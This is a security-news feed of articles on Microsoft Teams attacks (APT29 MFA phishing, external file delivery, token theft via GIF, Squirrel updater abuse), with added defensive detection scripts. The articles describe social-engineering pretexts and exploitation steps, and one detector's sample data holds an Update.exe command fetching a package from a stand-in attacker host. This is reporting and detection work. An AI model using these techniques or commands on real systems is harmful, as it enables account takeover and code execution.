Information Security Newspaper | Infosec Articles | Hacking News (https://www.securitynewspaper.com/), feed retrieved Thu, 03 Aug 2023

Phishing attack over Microsoft Teams allows getting MFA from victim
https://www.securitynewspaper.com/2023/08/03/phishing-attack-over-microsoft-teams-allows-getting-mfa-from-victim/
Thu, 03 Aug 2023 22:55:47 +0000

The post Phishing attack over Microsoft Teams allows getting MFA from victim appeared first on Information Security Newspaper | Hacking News.

Hackers working for the Russian government posed as technical support staff on Microsoft Teams in order to breach organizations around the world, including government entities.

Microsoft security researchers said on Wednesday, 2 August 2023, that the Russian state-sponsored group Microsoft tracks as “Midnight Blizzard”, better known as APT29 or Cozy Bear, was behind the “highly targeted” social engineering campaign.

The campaign began in late May 2023. The attackers used Microsoft 365 tenants hijacked in earlier intrusions to create new domains with a technical-support theme, and from those domains sent Microsoft Teams messages designed to trick users into approving multifactor authentication (MFA) prompts. The end goal was access to the victims’ accounts and the data in them.

To host and launch the lures, the actor uses Microsoft 365 tenants belonging to small businesses it had compromised in earlier attacks. The actor renames the compromised tenant, adds a new onmicrosoft.com subdomain, and then creates a new user on that domain from which the outbound Teams message to the target tenant is sent. The new tenant name and subdomain use keywords such as a product name or a security-related term so that the message appears legitimate. Microsoft’s investigation is continuing, including into the precursor attacks that compromised the legitimate Azure tenants and into the use of homoglyph domain names in the lures. Microsoft has taken action to prevent the actor from using these domains.

Chain of attacks using social engineering

In this activity, Midnight Blizzard has either already obtained valid credentials for the targeted users, or is targeting users whose accounts are configured for passwordless authentication. In either case the sign-in uses number matching: the user must enter a number displayed in the authentication flow into the prompt in the Microsoft Authenticator app on their phone.

The actor starts a sign-in to the target’s account, so the number to be matched is shown on the attacker’s screen and the user receives a push prompt from Authenticator asking for that number. The actor then messages the user over Microsoft Teams, asking them to enter the number into the prompt on their device. Because the user did not start this sign-in themselves, the unexpected prompt is the first sign that something is wrong.

Step 1: Teams message request

An external user posing as a member of the security or technical support team sends a Microsoft Teams message request to the targeted user.

Step 2: Request for action in the Authenticator app

If the target accepts the message request, the attacker sends a Teams message trying to persuade the user to enter a number into the Microsoft Authenticator app on their mobile device.

Step 3: MFA completed successfully

If the target enters the number into Microsoft Authenticator, the actor receives a token to authenticate as the targeted user and gains access to the user’s Microsoft 365 account.

The actor then performs post-compromise activity, typically theft of information from the compromised Microsoft 365 tenant. In some cases the actor also registers a device with the organization through Microsoft Entra ID (formerly Azure Active Directory), most likely to get around conditional access policies that restrict access to certain resources to managed devices only.
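The lure infrastructure and the follow-on device registration described above can be hunted for in Teams and directory audit telemetry. The script below is an added example, not code from the original article or from Microsoft: it scores external Teams senders on the indicators Microsoft described (a default *.onmicrosoft.com subdomain, a product or security keyword in the tenant name, homoglyph or punycode domains) and correlates a high-scoring lure with a device registration by the same targeted user. The record layout, field names, keyword list, the contoso.com home tenant and all sample records are constructed for the example and are not the Unified Audit Log schema.

```python
"""
Added example, not code from the original article or from Microsoft.
Hunts constructed Teams/Entra audit records for the Midnight Blizzard lure
pattern: an external sender on a *.onmicrosoft.com subdomain named after a
security or support theme (or a homoglyph domain), followed by a device
registration by the same targeted user. Field names, keywords, the home
tenant and the sample data are assumptions made for this example.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta

# Verified domains of the defending tenant (assumption for the example).
HOME_DOMAINS = {"contoso.com", "contoso.onmicrosoft.com"}

# Product / security themed words seen in lure tenant and subdomain names;
# illustrative list, extend it from your own telemetry.
LURE_KEYWORDS = ("protection", "security", "identity", "verification",
                 "msft", "microsoft", "support", "helpdesk", "azure")

ALERT_THRESHOLD = 2                     # indicators needed to flag a message
CORRELATION_WINDOW = timedelta(hours=24)  # device registration this soon after = related


@dataclass
class TeamsMessage:
    sender: str      # UPN of the sender
    recipient: str   # UPN of the targeted user
    sent_at: str     # ISO-8601 timestamp


@dataclass
class DirectoryEvent:
    operation: str   # e.g. "Add registered device."
    user: str
    occurred_at: str


def sender_domain(upn):
    return upn.rsplit("@", 1)[-1].lower().rstrip(".")


def has_homoglyph(domain):
    """Non-ASCII code points or punycode labels are homoglyph indicators."""
    return any(ord(ch) > 127 for ch in domain) or "xn--" in domain


def lure_score(msg):
    """Return (score, reasons) for one Teams message; 0 for internal messages."""
    dom = sender_domain(msg.sender)
    if dom in HOME_DOMAINS:
        return 0, []
    reasons = ["external sender " + dom]
    if dom.endswith(".onmicrosoft.com"):
        reasons.append("default onmicrosoft.com subdomain")
        label = dom[: -len(".onmicrosoft.com")]
        hits = [k for k in LURE_KEYWORDS if k in label]
        if hits:
            reasons.append("lure keyword in tenant name: " + ",".join(hits))
    if has_homoglyph(dom):
        reasons.append("homoglyph/punycode in sender domain")
    return len(reasons), reasons


def find_incidents(messages, events):
    """Map targeted user -> lure reasons and whether a device registration
    (the conditional access bypass step) followed within CORRELATION_WINDOW."""
    incidents = {}
    for msg in messages:
        score, reasons = lure_score(msg)
        if score < ALERT_THRESHOLD:
            continue
        sent = datetime.fromisoformat(msg.sent_at)
        followed = any(
            ev.operation == "Add registered device."
            and ev.user.lower() == msg.recipient.lower()
            and sent <= datetime.fromisoformat(ev.occurred_at) <= sent + CORRELATION_WINDOW
            for ev in events
        )
        entry = incidents.setdefault(msg.recipient, {"reasons": [], "device_registered": False})
        entry["reasons"].extend(reasons)
        entry["device_registered"] = entry["device_registered"] or followed
    return incidents


# Constructed sample telemetry (not real data).
SAMPLE_MESSAGES = [
    TeamsMessage("helpdesk@msftprotection.onmicrosoft.com", "alice@contoso.com", "2023-06-01T09:00:00"),
    TeamsMessage("bob@contoso.com", "alice@contoso.com", "2023-06-01T09:05:00"),
    TeamsMessage("vendor@fabrikam.com", "carol@contoso.com", "2023-06-01T10:00:00"),
]
SAMPLE_EVENTS = [
    DirectoryEvent("Add registered device.", "alice@contoso.com", "2023-06-01T11:30:00"),
]

if __name__ == "__main__":
    for user, info in find_incidents(SAMPLE_MESSAGES, SAMPLE_EVENTS).items():
        print(user, "device registered" if info["device_registered"] else "", info["reasons"])
```

A plain external sender (vendor@fabrikam.com) scores one indicator and is not flagged; the lure tenant scores three and, because alice’s account registered a device two and a half hours later, the incident is marked as having reached the conditional access bypass stage. Tune the keyword list and the window to your own tenant before using this as an alert.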

Microsoft Teams allows sending malware to hack someone via this vulnerability
https://www.securitynewspaper.com/2023/06/23/microsoft-teams-allows-sending-malware-to-hack-someone-via-this-vulnerability/
Fri, 23 Jun 2023 15:20:05 +0000

Any user with a Microsoft account can message users in other organizations’ tenants through Microsoft Teams. From the point of view of a given organization, every other company that uses Teams is an “external tenant”.

Members of the red team at the security firm Jumpsec found a way to deliver malware over Microsoft Teams from an account that is not part of the target organization.

Because each organization has its own Microsoft 365 tenant, Teams lets users of one tenant chat with users of another (external access). When a message comes from another tenant, an “External” banner is shown next to the sender’s name.

Unlike chat with members of your own tenant, the client does not let you send files to users of other organizations; only text is allowed.

Jumpsec found that this restriction is enforced only on the client side: by changing the recipient ID in the POST request that sends the message, a file could be delivered to an external user anyway. When a payload is sent this way it is actually hosted on a SharePoint domain and the recipient downloads it from there, but it appears in the recipient’s Teams inbox as a file rather than as a link.

Because delivery bypasses most of the modern anti-phishing controls that are built around email, the Jumpsec advisory warns that this is a potentially lucrative channel for threat actors to deliver payloads.

First, buying and registering a domain that closely resembles the target organization’s and attaching it to an M365 tenant is a fairly basic process. It removes the need for a mature phishing domain, which would otherwise require web servers, landing pages, CAPTCHAs, domain categorization and evasion of URL filtering.

Second, it avoids the now well-known risk of clicking a link in an email, something staff have been trained to avoid for years, which greatly lowers the chance that an ordinary employee recognizes the message as phishing. The payload is served from a trusted SharePoint domain and arrives as a file in the target’s Teams inbox, so it inherits SharePoint’s reputation rather than being classified as a malicious phishing site.

Finally, when the flaw is paired with social engineering over Teams, it is simple to start a chat, jump on a call, share screens and so on, which makes email-based social engineering look static and stop-and-start by comparison. On a real engagement an attacker posing as an IT specialist can ask the target to join a call to install some urgent patches; once on the call, the flaw can be used to send the payload, and with a complete social engineering pretext the victim will implicitly trust the attacker.

Microsoft was notified of the flaw and confirmed it, but said that it “did not meet the bar for immediate servicing.” Organizations that do not need to chat with other tenants can disable external access in the Teams admin center, or restrict it to an allow list of trusted domains; staff should also be told that files and calls from external Teams users deserve the same suspicion as email attachments.
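The two controls a defender actually has here are the tenant’s external access policy (evaluated server-side, so the client-side bypass does not affect it) and scrutiny of any file that still arrives from an external sender. The script below is an added example, not code from the Jumpsec advisory or from Microsoft: it models the four Teams external access modes, decides whether a sender is admitted, and then checks whether a file in the message is hosted on a SharePoint tenant other than our own, which is exactly how the payload described above shows up. The policy layout, the contoso.com home tenant, its SharePoint host names and the sample messages are constructed for the example and are not the Teams admin API.

```python
"""
Added example, not code from the original advisory or from Jumpsec/Microsoft.
Models (1) the Teams external-access (federation) policy evaluated against a
sender's domain and (2) a review of files that arrive from an accepted
external sender, flagging files hosted on a foreign SharePoint tenant.
Policy layout, home tenant names and samples are assumptions for the example.
"""
from urllib.parse import urlparse

# Defending tenant (assumption for the example).
HOME_DOMAINS = {"contoso.com", "contoso.onmicrosoft.com"}
HOME_SHAREPOINT_HOSTS = {"contoso.sharepoint.com", "contoso-my.sharepoint.com"}


def external_access_allows(policy, sender_dom):
    """Mirror the four Teams external-access modes: off, open, allow list, block list."""
    mode = policy["mode"]
    domains = {d.lower() for d in policy.get("domains", [])}
    if mode == "off":
        return False
    if mode == "open":
        return True
    if mode == "allowlist":
        return sender_dom in domains
    if mode == "blocklist":
        return sender_dom not in domains
    raise ValueError("unknown external access mode: " + mode)


def domain_of(upn):
    return upn.rsplit("@", 1)[-1].lower()


def review_message(policy, message):
    """Decide whether the message is accepted and list file-delivery findings.

    message = {"sender": UPN, "attachments": [urls]}
    """
    sender_dom = domain_of(message["sender"])
    internal = sender_dom in HOME_DOMAINS
    accepted = internal or external_access_allows(policy, sender_dom)
    findings = []
    if accepted and not internal:
        for url in message.get("attachments", []):
            host = (urlparse(url).hostname or "").lower()
            if host in HOME_SHAREPOINT_HOSTS:
                continue  # file lives in our own tenant's SharePoint
            if host.endswith(".sharepoint.com"):
                findings.append("file from external sender hosted on foreign SharePoint tenant " + host)
            else:
                findings.append("file from external sender on non-SharePoint host " + host)
    return {"accepted": accepted, "findings": findings}


# Constructed samples (not real data).
OPEN_POLICY = {"mode": "open"}
ALLOWLIST_POLICY = {"mode": "allowlist", "domains": ["partner.example"]}

LURE = {
    "sender": "it-support@fabrikam.com",
    "attachments": ["https://fabrikam.sharepoint.com/sites/it/Shared%20Documents/Patch.exe"],
}
INTERNAL = {
    "sender": "bob@contoso.com",
    "attachments": ["https://contoso-my.sharepoint.com/personal/bob/Documents/notes.docx"],
}

if __name__ == "__main__":
    print(review_message(OPEN_POLICY, LURE))
    print(review_message(ALLOWLIST_POLICY, LURE))
    print(review_message(ALLOWLIST_POLICY, INTERNAL))
```

With the default open policy the lure is accepted and the only thing left to catch it is the foreign-SharePoint finding; with an allow list the message never reaches the user. The host check matters because the file really is on *.sharepoint.com, so a reputation filter that stops at the registered domain will not distinguish the attacker’s tenant from yours.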

Vulnerability in Microsoft Teams could expose users’ sensitive information
https://www.securitynewspaper.com/2021/06/15/vulnerability-in-microsoft-teams-could-expose-users-sensitive-information/
Tue, 15 Jun 2021 22:24:42 +0000

A recent security report describes a flaw in the chat service built into Microsoft Teams that could have allowed an attacker to impersonate an employee of an affected company and send email on their behalf for malicious purposes. Evan Grant, the researcher behind the report, explains that the flaw lies in Microsoft Power Apps, a platform for building low-code and no-code applications.

Although the attack requires several pieces to come together, the final exploitation is simple and the impact can be severe: “The flaw can be exploited to establish persistent read/write access to the affected user’s Microsoft infrastructure, including Teams chat, OneDrive and SharePoint,” the researcher notes.

The attack is carried out with a malicious Teams tab and by abusing Power Automate flows. Grant reported his finding to Microsoft’s security teams and the flaw was fixed shortly afterwards.

In his report, the researcher walks through a hypothetical scenario in which an attacker (baduser@fakecorp.ca in the write-up) creates a malicious Teams tab and uses it to steal emails, messages and files from Teams on behalf of a legitimate user. Unrestricted access to a user’s inbox is a great opportunity for threat actors, effectively a business email compromise (BEC) scenario.

In a BEC attack, threat actors pose as members of the target company to trick legitimate employees into diverting money to attacker-controlled accounts. Such attacks require the attackers to gather a great deal of information about the target: organizational chart, job titles, work routines, financial statements and security practices.

The attack starts with creating the malicious Teams tab. Grant did this by abusing a platform feature that lets users add small applications as tabs in any team of which they are members.

Once the malicious tab is in place, the attacker can act as the legitimate user and steal authentication tokens, then mount the attacks typical of a BEC scenario. Microsoft has updated the affected service, so the risk is expected to be fully mitigated.


Hacking Microsoft Teams by simply using a GIF image
https://www.securitynewspaper.com/2020/04/27/hacking-microsoft-teams-by-simply-using-a-gif-image/
Mon, 27 Apr 2020 19:12:20 +0000


As the use of video conferencing platforms for remote work grows, the big technology companies continue to fight over a market that was only lightly exploited before the pandemic. The surge in use of these tools has also exposed multiple security flaws, security researchers note.

One of the most recent involves a malicious GIF that could have been used to steal information from Microsoft Teams accounts and, by exploiting a vulnerability in how the service handles authentication tokens, to take over an organization’s Teams deployment. The issue was found in late February 2020 and the affected DNS records were fixed on April 20, so no further attacks of this kind are expected.

According to the researchers, the vulnerability affected every version of Microsoft Teams for desktop and web browser. The problem lies in how the client handles the authentication tokens used when displaying images.

Those tokens are scoped to teams.microsoft.com and every subdomain under it, so any host in that zone receives them. CyberArk researchers found two subdomains (aadsync-test.teams.microsoft.com and data-dev.teams.microsoft.com) whose DNS records pointed at resources that were no longer claimed, so an attacker could take them over.

If an attacker could get a target to make a request to one of these subdomains, the victim’s authentication token (the authtoken cookie) would be sent to the attacker-controlled host. With that token the attacker could request a Skype token, which grants access to the Teams API on the victim’s behalf and lets the attacker read and send messages across the Teams deployment.

Up to this point, this looks like a conventional phishing attack that needs a click. The researchers, however, showed that a malicious GIF (in their demo, an image of Donald Duck) is enough: just viewing a message containing the image makes the Teams client fetch it, and because the GIF was served from the taken-over subdomain, the client sends the authentication token with that request without any action by the user.

This variant could have been turned into a worm for follow-on attacks: an attacker who obtains one user’s token can send the GIF to that user’s contacts and harvest their tokens in turn. The researchers stressed that requiring nothing more than viewing a GIF makes it particularly dangerous, as well as an entry point into other parts of the network.
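The mechanism behind the GIF is ordinary cookie scoping: a cookie set with Domain=teams.microsoft.com is attached by the client to every request for a subdomain of that zone, so an `<img>` pointing at a taken-over subdomain leaks it without any click. The script below is an added example, not code from the original article or from CyberArk, and simulates that decision offline (nothing is sent): it implements RFC 6265 domain matching, extracts the image sources a client would fetch automatically from a chat fragment, and reports which cookies each image host would receive. The cookie jar, cookie names, the chat fragment and the “strict” host-only variant are constructed for the example.

```python
"""
Added example, not code from the original article or from CyberArk/Microsoft.
Shows why an <img> in a Teams chat can leak a token: a cookie scoped to
teams.microsoft.com is sent to every subdomain, including a taken-over one.
The jar, cookie names and chat fragment are constructed; nothing is sent.
"""
from dataclasses import dataclass
from html.parser import HTMLParser
from urllib.parse import urlparse


@dataclass
class Cookie:
    name: str
    domain: str       # Domain attribute, or the origin host if host_only
    host_only: bool   # True when Set-Cookie carried no Domain attribute
    secure: bool = True


def domain_matches(request_host, cookie_domain):
    """RFC 6265 section 5.1.3 domain matching (request host is not an IP here)."""
    request_host = request_host.lower().rstrip(".")
    cookie_domain = cookie_domain.lower().lstrip(".").rstrip(".")
    return request_host == cookie_domain or request_host.endswith("." + cookie_domain)


def cookies_sent_to(jar, url):
    """Names of the cookies a client attaches to a request for url."""
    parts = urlparse(url)
    host = (parts.hostname or "").lower()
    sent = []
    for c in jar:
        if c.secure and parts.scheme != "https":
            continue
        if c.host_only:
            if host != c.domain.lower():
                continue
        elif not domain_matches(host, c.domain):
            continue
        sent.append(c.name)
    return sent


class ImageSources(HTMLParser):
    """Collect src attributes of <img> tags, which a client fetches automatically."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for key, value in attrs:
                if key == "src" and value:
                    self.sources.append(value)


def leaked_by_chat(jar, chat_html):
    """Map every image host in the chat to the cookies that leak to it."""
    parser = ImageSources()
    parser.feed(chat_html)
    leaks = {}
    for src in parser.sources:
        host = urlparse(src).hostname
        names = cookies_sent_to(jar, src)
        if host and names:
            leaks[host] = names
    return leaks


# Constructed jar: the token cookie scoped to the whole teams.microsoft.com
# zone (the vulnerable state) versus the same cookie bound to the exact host.
WIDE_JAR = [Cookie("authtoken", ".teams.microsoft.com", host_only=False)]
STRICT_JAR = [Cookie("authtoken", "teams.microsoft.com", host_only=True)]

# Constructed chat message: a GIF served from one of the subdomains named above.
GIF_MESSAGE = '<p>lol</p><img src="https://aadsync-test.teams.microsoft.com/duck.gif">'

if __name__ == "__main__":
    print(leaked_by_chat(WIDE_JAR, GIF_MESSAGE))    # {'aadsync-test.teams.microsoft.com': ['authtoken']}
    print(leaked_by_chat(STRICT_JAR, GIF_MESSAGE))  # {}
```

The wide scope is a design choice (Teams services genuinely live on several subdomains), which is why Microsoft’s fix was to remove the dangling DNS records rather than to narrow the cookie; the lesson for anyone running a multi-subdomain service is that every name under a cookie’s Domain must stay under your control, and that dangling CNAMEs are therefore an authentication bug, not just a DNS hygiene issue.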

According to the International Institute of Cyber Security (IICS), Microsoft corrected the vulnerability promptly and is monitoring Teams deployments for related malicious activity.

Vulnerability in Microsoft Teams could allow hacker to gain complete control of your infrastructure
https://www.securitynewspaper.com/2019/07/02/vulnerability-in-microsoft-teams-could-allow-hacker-to-gain-complete-control-of-your-infrastructure/
Tue, 02 Jul 2019 23:08:34 +0000

Microsoft Teams, a collaboration platform for enterprise environments, contains a vulnerability that would let any user run malicious code through the platform’s own signed binary and potentially escalate privileges, report specialists in IT system audits.

According to the reports, the Teams vulnerability is exploited by running the desktop application’s updater with attacker-controlled input. The same issue affects the desktop versions of WhatsApp and GitHub, although in those applications the flaw was only shown to download a payload, not to execute it.

All of the affected applications use Squirrel, an open-source framework that handles installation and updates, with application files packaged and managed as NuGet packages, the IT audit experts report.

Microsoft has not yet fixed the reported vulnerability. Reegun Richard, the researcher who reported the flaw to Microsoft, initially intended to hold back details until the company resolved it; on discovering that other researchers were working on the same flaw, he published his findings to help get it fixed.

The researcher found that he could execute malicious code through Microsoft’s legitimately signed binary without needing extra privileges, and where the application runs with control over system files, privileges could easily be escalated.

To exploit the flaw, an attacker tricks the Teams update mechanism into fetching malicious code through Microsoft’s signed binary. The attacker takes any .nupkg package, unpacks it, and replaces its contents with shellcode in an executable named “squirrel.exe”. With the crafted package in place, the attacker goes to the application folder and runs Update.exe with its --update option pointing at the package; the application “updates” itself and the attacker’s shellcode is fetched and run under the trusted binary.
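Since the abused binary is legitimately signed, the practical defence is detection on process creation rather than blocking Update.exe. The script below is an added example, not code from the original article or from Reegun Richard: it runs the checks a detection engineer would write for the technique above over constructed process-creation events, flagging Update.exe told to update or download from a local path or an untrusted host, an unexpected binary passed to --processStart, and children of Update.exe that are not the application’s own executable. The event field names, the trusted update host, the expected child list and the sample events are assumptions made for the example; --update, --download and --processStart are Squirrel’s documented Update.exe options.

```python
"""
Added example, not code from the original article or from Reegun Richard.
Detection for Squirrel Update.exe abuse over constructed process-creation
events. Field names, the trusted host list, the expected child list and the
sample events are assumptions for this example.
"""
import re
from urllib.parse import urlparse

# Host Teams is expected to pull packages from (assumption; adjust to telemetry).
TRUSTED_UPDATE_HOSTS = {"statics.teams.cdn.office.net"}
# Executables Update.exe legitimately launches for this application.
EXPECTED_CHILDREN = {"teams.exe"}
SQUIRREL_IMAGES = {"update.exe", "squirrel.exe"}

# Matches --update=<src>, --update <src>, --download=<url>, --processStart "<exe>"
ARG_RE = re.compile(r'--(update|download|processStart)(?:=|\s+)"?([^"\s]+)"?', re.I)


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def squirrel_args(cmdline):
    """Return {option: value} for the Squirrel options present on the command line."""
    return {opt.lower(): val for opt, val in ARG_RE.findall(cmdline)}


def analyze_event(ev):
    """Return the reasons this process-creation event looks like Squirrel abuse."""
    image = basename(ev["image"])
    parent = basename(ev.get("parent", ""))
    reasons = []
    if image in SQUIRREL_IMAGES:
        args = squirrel_args(ev["cmdline"])
        src = args.get("update") or args.get("download")
        if src:
            parsed = urlparse(src)
            if parsed.scheme in ("http", "https"):
                host = (parsed.hostname or "").lower()
                if host not in TRUSTED_UPDATE_HOSTS:
                    reasons.append("update fetched from untrusted host " + host)
            else:
                # "C:\..." parses as scheme "c"; anything non-HTTP is a local or UNC path
                reasons.append("update applied from local/UNC path " + src)
        started = args.get("processstart")
        if started and basename(started) not in EXPECTED_CHILDREN:
            reasons.append("processStart of unexpected binary " + started)
    if parent == "update.exe" and image not in EXPECTED_CHILDREN:
        reasons.append("Update.exe spawned unexpected child " + image)
    return reasons


def analyze(events):
    """Index -> reasons for every suspicious event."""
    flagged = {}
    for i, ev in enumerate(events):
        reasons = analyze_event(ev)
        if reasons:
            flagged[i] = reasons
    return flagged


TEAMS = r"C:\Users\u\AppData\Local\Microsoft\Teams"
# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"image": TEAMS + r"\Update.exe", "cmdline": r"Update.exe --update=C:\Users\Public\pkg",
     "parent": r"C:\Windows\System32\cmd.exe"},
    {"image": TEAMS + r"\Update.exe", "cmdline": 'Update.exe --processStart "Teams.exe"',
     "parent": r"C:\Windows\explorer.exe"},
    {"image": TEAMS + r"\current\squirrel.exe", "cmdline": "squirrel.exe --squirrel-updated 1.2.0.0",
     "parent": TEAMS + r"\Update.exe"},
    {"image": TEAMS + r"\Update.exe",
     "cmdline": "Update.exe --update=https://statics.teams.cdn.office.net/production-windows-x64/",
     "parent": TEAMS + r"\current\Teams.exe"},
    {"image": TEAMS + r"\Update.exe", "cmdline": "Update.exe --update=https://evil.example/pkg",
     "parent": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for idx, why in analyze(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"], "->", why)
```

Events 0, 2 and 4 are flagged (local package, a squirrel.exe child that is not Teams.exe, and an untrusted download host); the ordinary --processStart launch and the update from the expected CDN host are left alone. The --squirrel-updated hook argument on event 2 is what Squirrel passes to a package’s executables after an update, so a non-Teams binary receiving it is the post-update execution the researcher described.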

Specialists in IT system audits from the International Institute of Cyber Security (IICS) note that Richard’s decision to disclose the vulnerability is tied to Microsoft’s delay in releasing a fix, which leaves users exposed.
